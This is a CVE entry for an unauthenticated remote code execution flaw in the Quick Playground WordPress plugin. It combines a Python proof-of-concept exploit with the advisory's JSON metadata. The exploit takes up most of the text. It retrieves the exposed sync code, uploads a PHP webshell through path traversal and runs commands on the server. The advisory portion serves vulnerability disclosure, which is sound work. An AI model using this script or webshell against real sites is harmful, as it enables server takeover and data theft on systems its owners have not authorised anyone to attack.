CVE-2026-1830

import requests # Target configuration target_url = "http://example.com" # Step 1: Retrieve the sync code from the vulnerable endpoint # The description mentions the endpoint exposes a sync code sync_endpoint = f"{target_url}/wp-json/quick-playground/v1/sync" try: response = requests.get(sync_endpoint) if response.status_code == 200: # Assuming the API returns JSON with the code or the code is in the response body sync_code = response.text.strip() print(f"[+] Sync code retrieved: {sync_code}") except Exception as e: print(f"[-] Failed to retrieve sync code: {e}") exit() # Step 2: Upload malicious PHP file using path traversal # The vulnerability allows arbitrary file upload via REST API without auth upload_endpoint = f"{target_url}/wp-json/quick-playground/v1/upload" # PHP code to execute system commands (webshell) php_payload = "<?php system($_GET['cmd']); ?>" # Data payload including the sync code and path traversal files = { 'file': ('shell.php', php_payload, 'application/x-php') } data = { 'sync_code': sync_code, # Path traversal to upload to a web-accessible directory 'path': '../../uploads/' } try: upload_response = requests.post(upload_endpoint, files=files, data=data) if upload_response.status_code == 200: print("[+] File uploaded successfully.") # Step 3: Execute the code (Verifying the exploit) shell_url = f"{target_url}/wp-content/uploads/shell.php?cmd=whoami" exec_response = requests.get(shell_url) if exec_response.status_code == 200: print(f"[+] RCE Successful! Output: {exec_response.text}") else: print("[-] Upload succeeded but execution failed.") else: print(f"[-] Upload failed. Status: {upload_response.status_code}") except Exception as e: print(f"[-] Error during exploitation: {e}")

{"cve": {"id": "CVE-2026-1830", "sourceIdentifier": "[email protected]", "published": "2026-04-09T05:16:03.420", "lastModified": "2026-04-24T18:03:42.203", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve", "source": "[email protected]"}]}}